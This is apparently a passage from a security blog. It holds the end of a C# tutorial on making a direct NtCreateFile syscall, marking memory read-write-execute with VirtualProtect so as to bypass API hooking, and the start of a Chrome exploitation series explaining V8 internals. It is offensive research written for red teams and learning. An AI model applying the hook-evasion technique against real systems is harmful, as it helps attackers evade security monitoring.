But how can we do that? Well let me introduce you to our new little friend and lovely function called VirtualProtect.

What VritualProtect allows us to do is to change the protection on a region of committed pages in the virtual address space of the calling process. Meaning that by using this native function against our syscalls memory address (which we just obtained) we can make sure that the virtual process memory is set to read-write-execute!

So with that, let’s implement this native function inside Native.cs. This way we can use it within Syscalls.cs to change the memory protection on our assembly.

As always, let’s take a peek at the C structure for this function.

BOOL VirtualProtect(
  LPVOID lpAddress,
  SIZE_T dwSize,
  DWORD  flNewProtect,
  PDWORD lpflOldProtect
);

It seems simple enough. We just need to remeber to add the flNewProtect flags along with the function.

Let’s go ahead and add this. Once done, our implemented memory protection flags inside the Native class should look like so.

And the VirtualProtect function will look similar to the following.

Beautiful! We’ve made a ton of progress already and we’re nearing the end! Well… sort of. There’s still a few more things to do.

Now that we have our VirtualProtect function implemented, let’s return to our Syscall.cs file, and execute the VirtualProtect function against our memoryAddress pointer to give it read-write-execute permissions.

At the same time, let’s put this native function inside an IF statement. That way if the function fails, we can throw a Win32Exception to show us the error code and stop execution.

Also, make sure to add the using System.ComponentModel; directive at the top of your code. This way, you’ll be able to use the Win32Exception class.

Upon doing this, our code should look like the following:

Alright, so if the execution of VirtualProtect is successful, then the virtual memory address of our unmanaged syscall assembly (which the memoryAddress variable is pointing to) should now have read-write-execute permissions.

This means that we now have an unmanaged function pointer. So as explained before, and in my previous post - what we need to do now, is we need to utilize Marshal.GetDelegateForFunctionPointer to convert our unmanaged function pointer to a delegate of a specified type. In this case, we will be converting our function pointer to our NtCreateFile delegate.

Now, I know some of you might be a little confused or wondering why we are doing this. It should have became apparent to you what we are trying to do when I explained the memory protections. But either way, let me explain this so we’re all on the same page before we move on.

The reason we are converting our unmanaged function pointer to our NtCreateFile delegate is so that the function will behave like a callback function when our syscall assembly is executed. Take a look back into line 20 of our Syscalls.cs file.

What are we doing there? If you’re answer was β€œpassing parameters into a function” then you’re right!

Once this delegate accepts our parameters to create a file, it will go ahead and update the memory location of our syscall to be read-write-execute. It will then take this pointer to the syscall and convert it to our NtCreateFile delegate - which essential is just converting our syscall to it’s actual function representation.

Once that’s done, we will call the return statement against our initialized delegate along with our passed parameters. It’s essentially at this point that we are pushing the parameters onto the stack, executing the syscall, and returning the results back to the caller - which should be coming from Program.cs!

Makes sense now? Perfect! Consider yourself a graduate of syscall academy! πŸ‘¨β€πŸŽ“

Okay, with all that explained let’s go ahead and implement our Marshal.GetDelegateForFunctionPointer conversion by first instantiating our NtCreateFile delegate and calling it assembledFunction. Once done, let’s carry out the conversion of our unmanaged pointer to our delegate.

After that’s completed, we can write a simple return statement to return all the parameters from our syscall via the instantiated assembledFunction delegate.

Our finalized Syscall.cs code should now look like the following.

And there we have it, the finalized version of how our syscall will execute once it’s function is called!

Executing our Syscall

So, we implemented our syscall logic, now all that’s left to do is to actually write the code in our program to utilize the NtCreateFile function, which will initially execute our syscall.

For starters, let’s make sure we import our static classes so that we can use all our native functions and our syscall, like so.

Once that’s done, we can start initializing the structures and variables required by NtCreateFile, such as the file handle and object attributes.

But before we do that, let me just state one thing. The OBJECT_ATTRIBUTES, specifically it’s ObjectName member, requires a pointer to a UNICODE_STRING that contains the name of the object for which a handle is to be opened. Specifically this is the file name that we want to create.

Now, for unmanaged code, to initialize this structure we need to call the RtlUnicodeStringInit function.

So, let’s make sure we add that function inside our Native.cs file so we can utilize that function.

Once we have that, we can then go ahead and initialize our first few structures. We’ll create our file handle, as well as our unicode string structure.

We’ll opt for saving our test file to our desktop, so we’ll set the filename path to be C:\Users\User\Desktop.test.txt as shown below.

After completing that, we can now initialize our OBJECT_ATTRIBUTES structure.

Finally all that’s left to do is to initialize the IO_STATUS_BLOCK structure, and call our NtCreateFile delegate along with it’s parameters to execute the syscall!

After writing all that, your final Program.cs file should look like the following.

Awesome, we finally completed our code! Now comes the most important part - compiling the code!

In Visual Studio make sure we change the Solution Configuration to β€œRelease”. From there, in the toolbar above, click on Build –> Build Solution.

After a few seconds you should see the following output, which shows us that compilation was successful!

Okay, let’s not get too excited! The code might still fail during testing, but I’m sure it won’t! 😁

To test our newly compiled code, let’s open up command prompt and navigate to where our project is compiled. In my case that’s C:\Users\User\Source\Repos\SharpCall\bin\Release\.

As you can see, there is no test.txt file on my desktop, as shown below.

If everything goes well, then upon executing our SharpCall.exe executable, our syscall should be executed, and a new test.txt file should be created on the desktop.

Alright, the moment of truth. Let’s see this bad boy in action!

And there we have it! Our code works and were able to successfully execute our syscall!

But, how can we be so sure that it was the syscall that executed and not just the native api function from ntdll?

Well to make sure that it was our syscall that executed, we can once again utilize Process Monitor to monitor our executable.

From here, we can view specific Read/Write operation properties and their call stack.

After monitoring the process during execution, we see that there was one CreateFile operation for our test.txt file. If we were to view the call stack of that operation, we would see the following.

Well look at that! No calls from or to ntdll were made! Just a simple syscall from an unknown memory location to ntoskrnl.exe! We made a valid syscall!

This essentially would bypass any API hooking if there was one implemented on NtCreateFile! 😈

Closing

And there we have it ladies and gentleman! After learning a lot about Windows Internals, Syscalls, and C#, you should now be able to utilize what you learned here to create your own syscalls in C#!

The final code for this project has been added to the SharpCall reposiroty on my Github.

Now I did mention at the start of this blog post that I’ll post a few links to projects that utilize that same functionality. So if you get stuck or just want some inspiration then I suggest you look at the following projects.

Alright, we’ll that’s pretty much it! I really appreciate everyone for reading these blog posts and for making Part 1 such a shocking success! I wasn’t expecting it to be so well received. Hopefully you enjoyed this part as much as part 1, and I also hope you learned something new!

Thanks for reading everyone! Cheers!

Chrome Browser Exploitation, Part 1: Introduction to V8 and JavaScript Internals

22 October 2022 at 00:00

Web browsers, our extensive gateway to the internet. Browsers today play a vital role in modern organizations as more and more software applications are delivered to users via a web browser in the form of web applications. Pretty much everything you might have done on the internet involves the use of a web browser, and as a result, browsers are among the most utilized consumer facing software products on the planet.

As the gateway to the internet, browsers also introduce significant risks to the integrity of personal computing devices. We hear it almost on a daily basis now, β€œGoogle Chrome Bug Actively Exploited as Zero-Day”, or β€œGoogle Confirms Chrome’s Fourth Zero-Day Exploit In 2022”. In fact, browser exploits are nothing new, they’ve been occurring for years now with the first known documented remote-code-execution exploit being CVE-1999-0280. The first potentially public disclosure of a browser exploit being used in the wild was the β€œAurora” Internet Explorer exploit which affected Google back in December of 2010.

My interest in web browsers first sparked back in 2018 when my buddy Michael Weber introduced me to Offensive Browser Extension Development which really opened my eyes to the potential attack surface. Afterwards, I started to dig deeper into Chrome’s internals and started to become very interested in web browser exploitation. Because let’s be honest here, what kind of Red Team wouldn’t want a β€œone-click” or even a β€œno-click” web browser exploit?

When it comes to browsers in the world of security research, they are considered some of the most impressive targets to find vulnerabilities in. They’re also unfortunately some of the most complicated to look at, as the amount of prerequisite knowledge required to even begin researching browser internals makes it seem like an unattainable goal for many researchers.

In spite of that, I took the steps to dive in by taking maxpl0it’s amazing β€œIntroduction to Hard Target Internals” training course. Which I highly recommend you take! This course provided me with a lot of background information on the inner workings and internals of browsers such as Chrome and Firefox. Afterwards, I was off to the races reading everything I could from Chromium blogs to v8 dev posts.

Since my learning method is more of a β€œlearn it, teach it, know it” style, I am releasing this β€œChrome Browser Exploitation” blog post series to give you an introduction to browser internals and to explore Chrome browser exploitation on Windows in more depth, all while learning it myself.

Now you might be asking me, why Chrome and why Windows? Well, two reasons:

  1. Chrome has a market share of ~73%, making it the most widely used browser in the world.
  2. Windows has a market share of ~90%, making it also the most widely used OS in the world.

By learning to target the most widely used software in the world, as a Red Team, this makes our chances of finding bugs, writing exploits, and successfully using them in engagements much more likely.

WARNING Due to the massive complexity of browsers, JavaScript engines, and JIT compilers, these blog posts will be very, very heavy reads.

Currently, this will be a three (3) post blog series. But, depending on the complexity and amount of information covered, I might split up the material to multiple additional posts.

Do note - I am writing these blog posts as I learn along the way. So please bare with me as it might take some time for me to release follow up posts to this series.

With that being said, if you notice that I made a mistake in my posts, or am misleading the reader, then please reach out to me! Also, any recommendations, constructive criticism, critical feedback, etc. is very much appreciated!

Overall, by the end of this blog post series we will cover everything we need to know to start researching and exploiting potential Chrome bugs. In the final post of this series, we will attempt to exploit CVE-2018-17463 which was a JIT Compiler Vulnerability in Chrome v8’s Optimizer (TurboFan) discovered by Samuel Gross.

So, without further ado - let’s jump into the deep end and into the complex world of browser exploitation!

In today’s blog post, we will cover the basic prerequisite concepts that we need to fully understand before we dig any deeper. The following topics will be discussed:

  • The Flow of JavaScript Engines
    • JavaScript Engine Compiler Pipeline
    • Stack & Register Machines
  • JavaScript and V8 Internals
    • Object Representation
    • HiddenClasses (Map)
    • Shape (Map) Transitions
    • Properties
    • Elements and Arrays
  • Viewing Chrome Objects In-Memory
    • Pointer Tagging
    • Pointer Compression

But, before we begin, make sure to compile v8 and d8 on Windows to follow along. You can read my β€œBuilding Chrome V8 on Windows” gist for detailed instructions on how to do so.

The Flow of JavaScript Engines

We start our journey of browser internals by first understanding what JavaScript engines are and how they work. JavaScript engines are an integral part to the execution of JavaScript code on systems. Previously, they were mere interpreters, but today, modern JavaScript engines are complex programs that include a multitude of performance improving components such as optimizing-compilers and Just-In-Time (JIT) compilation.

There’s actually a multitude of different JS engines in use today, such as:

  • V8 - Google’s open source high-performance JavaScript and WebAssembly engine, used in Chrome.
  • SpiderMonkey - Mozilla’s JavaScript and WebAssembly Engine, used in Firefox.
  • Charka - A proprietary JScript engine developed by Microsoft for use in IE and Edge.
  • JavaScriptCore - Apple’s built-in JavaScript engine for WebKit use in Safari.

So why do we need these JavaScript engines, and all it’s complexities?

Well as we know, JavaScript is a lightweight, interpreted, object-oriented scripting language. In interpreted languages, the code is ran line-by-line and the result of running the code is immediately returned, so we don’t have to compile the code into a different form before the browser runs it. This usually doesn’t make such languages any good due to performance reasons. In that case, this is where compilation such as Just-In-Time compilation is involved; where JavaScript code is parsed into bytecode (which is an abstraction of machine code) and is then further optimized by JIT to make the code much more efficient and in a sense β€œfast”.

Now, while each of the above-mentioned JavaScript engines can have different compilers and optimizers, all of them are pretty much designed and implemented the same way based on the EcmaScript standard (also used interchangeably with JavaScript). The EcmaScript specification details how JavaScript should be implemented by the browser so that a JavaScript program will run exactly the same way in all browsers.

So, what really goes on after we execute JavaScript code? Well, to detail that, I have provided a diagram below that shows a high-level overview of the general β€œflow” or also known as the compilation pipeline of JavaScript engines.

This might look confusing at first, but don’t worry - it really isn’t too hard to understand. So, let’s break down the β€œflow” step by step and explain what each of these components does.

  1. Parser: Once we execute JavaScript code, the code is passed into the JavaScript engine and we enter our first step, and that’s parsing the code. The parser converts the code into the following:
    • Tokens: The code is first broken down into β€œtokens”, such as Identifier, Number, String, Operator, etc. This is known as β€œLexical Analysis” or β€œTokenizing”.
      • Example: var num = 42 gets broken down to var,num,=,42 and each β€œtoken” or item is then tagged with its type, so in this case it would be Keyword,Identifier,Operator,Number.
    • Abstract Syntax Tree (AST): Once the code has been parsed into tokens, the parser will convert those tokens into an AST. This part is called β€œSyntax Analysis” and it does what it says, it checks to make sure there are no syntax errors in the code.
      • Example: Using the above code example, the AST for that will look like so:
        {
          "type": "VariableDeclaration",
          "start": 0,
          "end": 13,
          "declarations": [
         {
        "type": "VariableDeclarator",
        "start": 4,
        "end": 12,
        "id": {
          "type": "Identifier",
          "start": 4,
          "end": 7,
          "name": "num"
        },
        "init": {
          "type": "Literal",
          "start": 10,
          "end": 12,
          "value": 42,
          "raw": "42"
        }
         }
          ],
          "kind": "var"
        }
        
  2. Interpreter: Once an AST has been generated, it’s then passed into the Interpreter which walks the AST and generates bytecode. Once the bytecode has been generated, it is executed and the AST is deleted.
    • A list of Bytecodes for V8 can be found here.
    • An example of the bytecode for var num = 42; is shown below:
      LdaConstant [0]
      Star1
      Mov <closure>, r2
      CallRuntime [DeclareGlobals], r1-r2
      LdaSmi [42]
      StaGlobal [1], [0]
      LdaUndefined
      Return
      
  3. Compiler: The compiler works ahead of time by using something called a β€œProfiler” which monitors and watches code that should be optimized. If there is something known as a β€œhot function” the compiler takes that function and generates optimized machine code to execute. Otherwise, if it sees that a β€œhot function” that was optimized is no longer used, it will β€œdeoptimize” it back to bytecode.

When it comes to Google’s V8 JavaScript engine, the compilation pipeline is pretty similar. Although, V8 includes an additional β€œnon-optimizing” compiler which was recently added back in 2021. Now each component of V8 has a specific name to it, and they are as follows:

  • Ignition: V8’s fast low-level register-based interpreter that generates the bytecode.
  • SparkPlug: V8’s new non-optimizing JavaScript compiler that compiles from bytecode, by iterating the bytecode and emitting machine code for each bytecode as it is visited.
  • TurboFan: V8’s optimizing compiler that translates bytecode into machine code with more numerous, and more sophisticated code optimizations. It also includes JIT (Just-In-Time) compilation.

Putting that all together, the V8 compilation pipeline from a high-level overview is as follows:

Now, don’t worry if some of these concepts or features like compilers and optimizations don’t make sense currently. It’s not necessary that we understand the whole compilation pipeline for today’s post, but we should have a general idea of how the engine works as a whole. We’ll cover the V8 pipeline and its components in more depth within the second post of this series.

Till then, if you want to learn more about the pipeline, I suggest watching β€œJavaScript Engines: The Good Parts” to get a better understanding.

The only thing you should understand from this compilation pipeline currently is that the Interpreter is a β€œstack machine” or basically a VM (Virtual Machine) where bytecode is executed. In terms of Ignition (V8’s Interpreter) the interpreter is actually a β€œregister machine” with an accumulator register. Ignition still uses a stack, but it prefers to store things in registers to speed things up.

I suggest you read β€œUnderstanding V8’s Bytecode” and β€œFiring up the Ignition Interpreter” to get a better grasp of these concepts.

JavaScript and V8 Internals

Now that we have some basic knowledge of how a JavaScript engine and its compiler pipeline is structured, it’s time we dig a little deeper into the internals of JavaScript itself and see how V8 stores and represents JavaScript objects in memory, along with their values and properties.

This section is single handedly one of the most important pieces that you need to understand if you want to exploit bugs in V8, and other JavaScript engines as well. Because, as it turns out, all major engines implement the JavaScript object model in a similar fashion.

As we know, JavaScript is a dynamically typed language. Meaning, that type information is associated with runtime values rather than compile-time variables like in C++. This means that any object within JavaScript can have its properties easily modified during runtime. The JavaScript type system defines data types such as Undefined, Null, Boolean, String, Symbol, Number, and Object (including arrays and functions).

In simple terms, what does this mean? Well, it generally means that an object, or primitive such as var in JavaScript can change its data type throughout its runtime, unlike in C++. For example, let’s set a new variable called item in JavaScript and set it to 42.

var item = 42;

By using the typeof operator on the item variable, we can see that it returns its data type - which will be Number.

typeof item
'number'

Now what would happen if we try setting item to a string and then check it’s data type?

item = "Hello!";
typeof item
'string'

Look at that, the item variable is now set to the data type of String and not Number. This is what makes JavaScript β€œdynamic” in nature. Unlike in C++, if we tried creating an int or integer variable and later tried setting it to a string, it would fail - like so:

int item = 3;
item = "Hello!"; // error: invalid conversion from 'const char*' to 'int'
//     ^~~~~~~~

While this is cool in JavaScript, it does pose a problem for us. V8 and Ignition are written in C++ so the Interpreter and Compiler need to figure out how JavaScript is intending to use some of the data. This is critical for efficient code compilation especially because in C++ there are differences in memory sizes for data types such as int or char.

Aside from efficiency, this also is critical to security since if the Interpreter and Compiler β€œinterpret” the JavaScript code wrong and we get a dictionary object instead of an array object, we now have a Type Confusion vulnerability.

So how does V8 store all of this information with every runtime value, and how does the engine stay efficient?

Well, in V8, this is accomplished through the use of a dedicated information type object called a Map (not to be confused with Map Objects) which is otherwise known as a β€œHidden Class”. At times you might hear a Map be referred to as a β€œShape”, especially in Mozilla’s SpiderMonkey JavaScript engine. V8 also uses something called pointer compression or pointer tagging in memory (which we will discuss later in this post) to reduce memory consumption and allows V8 to represent any value in memory as a pointer to an object.

But, before we get too deep into the weeds of how all of those function, we first have to understand what are JavaScript Objects and how they are represented within V8.

Object Representation

In JavaScript, Objects are essentially a collection of properties which are stored as key, value pairs - essentially this means that objects behave like dictionaries. Objects can be Arrays, Functions, Booleans, RegExp, etc.

Each object in JavaScript has properties associated with it, which can simply be explained as a variable that helps define the characteristics of the object. For example, a newly created car object can have properties such as make, model, and year that help define what the car object is. You can access the properties of an object either through a simple dot-notation operator such as objectName.propertyName or through bracket notation such as objectName['propertyName'].

Additionally, each objects property maps to property attributes, which are used to define and explain the state of the objects properties. An example of what these property attributes look like within a JavaScript object can be seen below.

Now that we understand a little bit about what an object is, the next step is to understand how that object is structured in memory and where it’s stored.

Whenever an object is created, V8 creates a new JSObject and allocates memory for it on the heap. The value of the object is a pointer to the JSObject which contains the following within its structure:

  • Map: A pointer to the HiddenClass object that details the β€œshape” or structure of the object.
  • Properties: A pointer to an object containing named properties.
  • Elements: A pointer to an object containing numbered properties.
  • In-Object Properties: Pointers to named properties that were defined at object initialization.

To help you in visualizing that, the image below details how a basic V8 JSObject is structured in memory.

Looking into the JSObject structure we can see that the Properties and Elements are stored in two separate FixedArray data structures which makes adding and accessing properties or elements more efficient. The elements structure predominantly stores non-negative integers or array-indexed properties (keys), which are commonly known as elements. As for the properties structure, if the property key of an object is not a non-negative integer, like a string, the property will be stored either as an Inline-Object Property (explained later in the post) or within the properties structure, also sometimes referred to as an objects properties backing store.

One thing we must note is that while named properties are stored in a similar way as elements of an array, they are not the same when it comes to property access. Unlike elements, we cannot simply use the key to find the named properties position within the properties array; we need some additional metadata. As mentioned before, V8 utilizes a special object called a HiddenClass or Map that’s associated to each JSObject. This Map stores all the information on JavaScript objects which in turn allows V8 to be β€œdynamic”.

So, before we go any further into understanding the JSObject structure and its properties, we first need to look at and understand how this HiddenClass works in V8.

HiddenClass (Map) and Shape Transitions

As discussed previously, we know that JavaScript is a dynamically typed language. In particular, because of this, there is no concept of classes in JavaScript. In C++ if you create a class or object then you cannot add or delete methods and properties from it on the fly, unlike in JavaScript. In C++ and other object-oriented languages, you can store object properties at fixed memory offsets because the object layout for an instance of a given class will never change, but in JavaScript it can dynamically change during runtime. To combat this, JavaScript uses something called β€œprototype-based-inheritance”, where each object has a reference to a prototype object or β€œshape” whose properties it incorporates.

So how does V8 store an object’s layout?

This is where the HiddenClass or Map come into play. Hidden classes work similarly to a fixed object layout where the values of properties (or pointers to those properties) can be stored in a specific memory structure and then accessed with a fixed-offset between each one. These offsets are generated by Torque and can be found in within the /torque-generated/src/objects/*.tq.inc directory in V8. This pretty much serves as an identifier for the β€œshape” of an object, which in turn allows V8 to better optimize the JavaScript code and improve property access time.

As previously seen in the JSObject example above, the Map is another data structure within the object. That Map structure contains the following information:

  • The dynamic type of the object, such as String, JSArray, HeapNumber, etc.
  • Size of the object (in-object properties, etc.)
  • Object properties and where they are stored
  • Type of array elements
  • Prototype or Shape of the object (if any)

To help in visualizing how the Map object looks like in memory, I have provided a rather detailed V8 Map structure in the image below. More information on the structures can be found within V8’s source code and can be located within the /src/objects/map.h and /src/objects/descriptor-array.h source files.

Now that we understand how the layout of the Map looks like, let’s explain this β€œshape” that we constantly talk about. As you know, every newly created JSObject will have a hidden class of its own, which contains the memory offset for each of its properties. Here’s the interesting part; if at any time that object’s property is created, deleted or changed dynamically, then a new hidden class will be created. This new hidden class keeps the information of the existing properties with the inclusion of the memory offset to the new property. Now do note, that a new hidden class is only created when a new property is added, adding an array-indexed property does not create new hidden classes.

So how does this look like in practice? Well let’s take the following code for example:

var obj1 = {};
obj1.x = 1;
obj1.y = 2;

At the start we create a new object called obj1, which is created and stored within V8’s heap. Since this is a newly created object, we need to create a HiddenClass (obviously), even though no properties have been defined for this object yet. This HiddenClass is also created and stored within V8’s heap. For our example purposes, we’ll call this initial hidden class β€œC0”.

Once the next line of the code is reached and obj1.x = 1 is executed, V8 will create a second hidden class called β€œC1” that is based off of C0. C1 will be the first HiddenClass to describe the location of where property x can be found in memory. But, instead of storing the pointer to the value for x it actually will store the offset for x which will be at offset 0.

Okay, I know that at this point some of you might ask, β€œwhy an offset to the property and not to it’s value”?

Well, in V8 this is an optimization trick. Maps are relatively expensive objects in terms of memory usage. If we store the key, value pairs of properties in a dictionary format within every newly created JSObject then that’s going to cause a lot of computational overhead as parsing dictionaries is slow. Second of all, what happens if a new object, such as obj2 is created which shares the same properties of obj1 such as x and y? Even though the values might be different the two objects actually share the same named properties in the same order, or as we would call it, the same β€œshape”. In that case it would be wasteful for us to store the same property name in two different locations.

This is what allows V8 to be fast, it’s optimized so that a Map is shared as much as possible between similarly shaped objects. Since the property names are repeated for all objects within the same shape and because they’re in the same order, we can have multiple objects point to one single HiddenClass in memory with the offset to the properties instead of pointers to values. This also allows for easier garbage collection since Map’s are allocations of a HeapObject just like the JSObject is.

To better explain this concept, let’s side track for a moment from our example above and look at the important parts of the HiddenClass. The two most important parts of the HiddenClass that allow for the Map to have its β€œshape” is the DescriptorArray and the third bit field. If you look back into the Map structure above, you’ll notice that the third bit field stores the number of properties, and the descriptor array contains information about the named properties like the name itself, the position where the value is stored (offset), and the properties attributes.

For example, let’s say we create a new object such as var obj {x: 1}. The x property is going to be stored within the In-Object properties or Properties store of the JavaScript object. Since a new object is created, a new HiddenClass will also be created. Within that HiddenClass the descriptor array and the third bit field will be populated. The third bit field will set the numberOfOwnDescriptors to 1, since we only have one property, and then descriptor array will populate the key, details, and value portions of the array with details relating to property x. The value for that descriptor will be set to 0. Why 0? Well, the In-Object properties and the Properties store are just an array. So, by setting the value of the descriptor to 0, V8 knows that the keys value will be at offset 0 of that array for any object of the same shape.

A visual example of what we just explained can be seen below.

Let’s see how this looks like within V8. To start let’s launch d8 with the --allow-natives-syntax parameter, and execute the following JavaScript code:

d8> var obj1 = {a: 1, b: 2, c: 3}

Once completed, we’ll utilize the %DebugPrint() command against our object to display it’s properties, map, and other information such as the instance descriptor. Once executed, notice the following:

In Yellow we can see our object obj1. In Red we have the pointer to our HiddenClass or Map. Within that HiddenClass we have the instance descriptor which points to the DescriptorArray. Using the %DebugPrintPtr() function against the pointer to that array we can see more details on how that array looks like in memory, which is highlighted in Blue.

Take note, we have three properties, which matches the number of descriptors in the instance descriptors section of the map. Below that, we can see that the descriptor array holds our property keys, and the const data field holds the offsets to their associated values within the property store. Now, if we follow the arrow back up from the offsets to our object, we will notice that the offsets do match, and each property has its correct value assigned.

Also, take note on the right side of those properties you can see the location for each of those properties; which are in-object as I previously mentioned. This pretty much proves to us that the offsets are to the properties within the In-Object and Properties store.

Alright, now that we understand why we are using offsets, let’s go back to our HiddenClass example from before. As we said before, by adding property x to obj1, we will now have a newly created HiddenClass called β€œC1” with the offset to x. Since we are creating a new HiddenClass, V8 will update C0 with a β€œclass transition” which states that if a new object is created with the property of x, then the hidden class should switch directly to C1.

The process is then repeated when we execute obj1.y = 2. A new hidden class called C2 will be created, and a class transition is added to C1 stating that for any object with property x, if property y is added, then the hidden class should transition to C2. In the end, all of these class transitions create something known as a β€œtransition tree”.

Adding on, one must note that class transitions are dependent on the order in which properties are added to an object. So, in case that z was added after y, the β€œshape” would no longer be the same and follow the same transition path from C1 to C2. Instead, a new hidden class will be created and a new transition path would be added from C1 to account for that new property, further expanding the transition tree.

Now that we understand this, let’s take a look into how objects look like in memory when a Map is shared between two objects of the same shape.

To start, launch d8 again with the --allow-natives-syntax parameter, and then enter the following two lines of JavaScript code:

d8> var obj1 = {x: 1, y: 2};
d8> var obj2 = {x: 2, y: 3};

Once completed, we’ll again utilize the %DebugPrint() command against each of our objects to display their properties, map, and other information. Once executed, notice the following:

In Yellow we can see both of our objects, obj1 and obj2. Take note that each is a JS_OBJECT_TYPE with a different memory address in the heap, because obviously they’re separate objects with potentially different properties.

As we know, both of these objects share the same shape, since they both contain x and y in the same order. In that case, in Blue, we can see that the properties are in the same FixedArray with the offset for x and y being 0 and 1 respectively. The reason for this is because as we already know, same shaped objects share a HiddenClass (represented in Red) that will have the same descriptor array.

As you can see, most of the object’s properties and the Map addresses will be the same, all because both of these objects are sharing that single Map.

Now let’s focus on the back_pointer that’s highlighted in Green. If you look back into our C0 to C2 Map transition example, you’ll notice that we mentioned something called a β€œtransition tree”. This transition tree is created in the background by V8 each time a new HiddenClass is created and allows V8 to link the new and old HiddenClasses together. This back_pointer is part of that transition tree as it points back to the parent map of where the transition occurred from. This allows V8 to walk the back pointer chain until it finds the map holding an objects properties, i.e. their shape.

Let’s use d8 to take a deeper look into how that works. We’ll use the %DebugPrintPtr() command again to print the details of an address pointer in V8. In this case we will take the back_pointer address to view its details. Once done, your output should be similar to mines.

In Green we can see that the back_pointer resolves to a JS_OBJECT_TYPE in memory, which in fact turns out to be a Map! This map is that C1 map that we talked about previously. We know how a Map can backtrack to its previous Map, but how does it know what Map to transition to when there is a property added? Well, if we pay close attention to the information within that Map, we’ll notice that below the instance descriptor pointer there is a β€œtransitions” section in Red. This transition section contains the information pointed to by the Raw Transition Pointer within the Map structure.

In V8, Map transitions use something called a TransitionsAccessor. This is a helper class that encapsulates access to the various ways a Map can store transitions to other maps in its respective field at Map::kTransitionsOrPrototypeInfo other known as the Raw Transition Pointer that we mentioned earlier. This pointer points to something known as a TransitionArray which again is a FixedArray that holds map transitions for property changes.

Looking back into the Red highlighted section, we can see that there is only one transition in that transition array. Within that array we can see that transition #1 details a transition for when the y property is added to the object. If y is added, it tells the map to update itself with the map stored in 0x007f00259735 which matches our current map! In the case that there was another transition, for example, z was added to x instead of y, then we would have two items within that transition array, each pointing to its respective map for that objects shape.

NOTE: If you would like to play around with Maps and have another visual representation of Map transitions, I recommend utilizing V8’s Indicium tool. The tools is a unified web interface that allows one to trace, debug and analyze patterns of how Maps are created and modified in real-world applications.

Now, what would happen to the transition tree if we deleted a property? Well, in this case there is a nuance to V8 creating a new map each time a property deletion occurs. As we know, maps are relatively expensive when it comes to memory usage, so at a certain point the cost of inheriting and maintaining a transition tree will get larger and slower. In the case the last property of an object is deleted, the Map will just adjust the back pointer to go back to its previous map, instead of creating a new one. But what happens if we delete the middle property of an object? Well in that case V8 will give up on maintaining the transition tree whenever we are adding too many attributes or deleting non-last elements, and it’ll switch to a slower mode known as dictionary mode.

So, what is this dictionary mode? Well, now that we know how V8 uses HiddenClasses to track the shape of objects, we can now go back full circle and dive into further understanding how these Properties and Elements are actually stored and handled in V8.

Properties

As explained previously, we know that JavaScript objects have two fundamental kinds of properties: named properties and indexed elements. We’ll start by covering named properties.

If you recall back to our discussion on Maps and the Descriptor Array, we mentioned named properties being stored either In-Object or within the Property array. What is this In-Object Property that we are talking about?

Well, in V8 this mode is a very fast method of storing properties directly on the object since they are accessible without any indirection. Although they are very fast, they are also limited to the initial size of the object. If more properties get added than there is space in the object, then the new properties are stored within the properties store - which adds one level of indirection.

In general, there are two β€œmodes” that JavaScript engines use to store properties, and those are called:

  • Fast Properties: Typically used to define the properties stored in the linear properties store. These properties are simply accessed by index in the properties store by consulting the Descriptor Array array within the HiddenClass.
  • Slow Properties: Also known as β€œdictionary mode”, this mode is utilized when there are too many properties being added or deleted - resulting in a lot of memory overhead. As a result, an object with slow properties will have a self-contained dictionary as a properties store. All the properties meta information is no longer stored in the Descriptor Array in the HiddenClass but directly in the properties dictionary. V8 will then use a hash table to access these properties.

An example of how a Map would look like when it transitions to slow properties with the self-contained dictionary can be seen below.

One thing must be noted here as well. Shape transitions only work for fast properties and not slow properties due to the fact that dictionary shapes are used by a single object only, so they can’t be shared between different objects and therefore have no transitions.

Elements

Alright, at this point we pretty much covered named properties. Now let’s take a look at array-indexed properties or elements. One would think that the handling of indexed properties would be less complex… but you would be wrong to assume that. The handling of elements is no less complex then named properties. Even though all indexed properties are kept in the elements store, V8 makes a very precise distinction on what kind of elements each array contains. There is actually ~21 different types of elements that can be tracked within that store! This initially allows V8 to optimize any operations on the array specifically for that type of element.

What do I mean by that? Well, let’s take this line of code for example:

const array = [1,2,3];

In JavaScript if we run the typeof operation against this, it would say that the array contains numbers because JavaScript does not distinguish the difference between an integer, float, or double. However, V8 makes much more precise distinctions and will classify this array as a PACKED_SMI_ELEMENTS, with SMI referring to Small Integers.

So, what’s with the SMI? Well, V8 keeps track of what kind of elements each array contains. It then uses this information to optimize array operations for this type of element. Within V8 there are three distinct element types that we need to know about, and they are:

  • SMI_ELEMENTS - Used to represent an array that contains small integers, such as 1,2,3, etc.
  • DOUBLE_ELEMENTS - Used to represent an array that contains floating-point numbers, such as 4.5, 5.5, etc.
  • ELEMENTS - Used to represent an array that contains string literal elements or values that cannot be represented as an SMI or Double, such as β€˜x’.

So how does V8 use these element types for an array? Are they set for the array or for each element? The answer is that the element type is set for the array. The important thing we have to remember is that element kinds have a β€œtransition” that only go in one direction. We can view this transition tree from a β€œtop down” approach as such.

For example, let’s take our array example from before:

const array = [1,2,3];
// Elements Kind: PACKED_SMI_ELEMENTS

As you can see, V8 tracks this array’s elements kind as a packed SMI (we’ll detail what packed is in a moment). Now, if we were to add a floating-point number, then the array’s elements kind would β€œtransition” to the Double elements kind, as such.

const array = [1,2,3];
// Elements Kind: PACKED_SMI_ELEMENTS
array.push(3.337)
// Elements Kind: PACKED_DOUBLE_ELEMENTS

The reason for this transition is simple, operation optimizations. Because we have a floating-point integer, V8 needs to be able to perform optimizations on those values so it transitions down one step to DOUBLES because a set of numbers that can be represented as a SMI is a subset of the numbers that can be represented as a double.

Since elements kind transitions go one way, once an array is marked with a lower elements kind, such as PACKED_DOUBLES_ELEMENTS it can no longer go back β€œup” to PACKED_SMI_ELEMENTS, even if we replace or remove that floating-point integer. In general, the more specific an elements kind is when you create an array, the more fine-grained optimizations are enabled. The further down the elements kind you go, the slower manipulations of that object might be.

Next, we also need to understand the first major distinction that V8 has when it tracks element backing stores when an index is deleted, or empty. And those are:

  • PACKED - Used to represent arrays that are dense, meaning that all available elements in the array have been populated.
  • HOLEY - Used to represent arrays that have β€œholes” in them, such as when an indexed element is deleted, or not defined. This is also known as making an array β€œsparse”.

So let’s take a closer look at this. For example, let’s take the following two arrays:

const packed_array = [1,2,3,5.5,'x'];
// Elements Kind: PACKED_ELEMENTS
const holey_array = [1,2,,5,'x'];
// Elements Kind: HOLEY_ELEMENTS

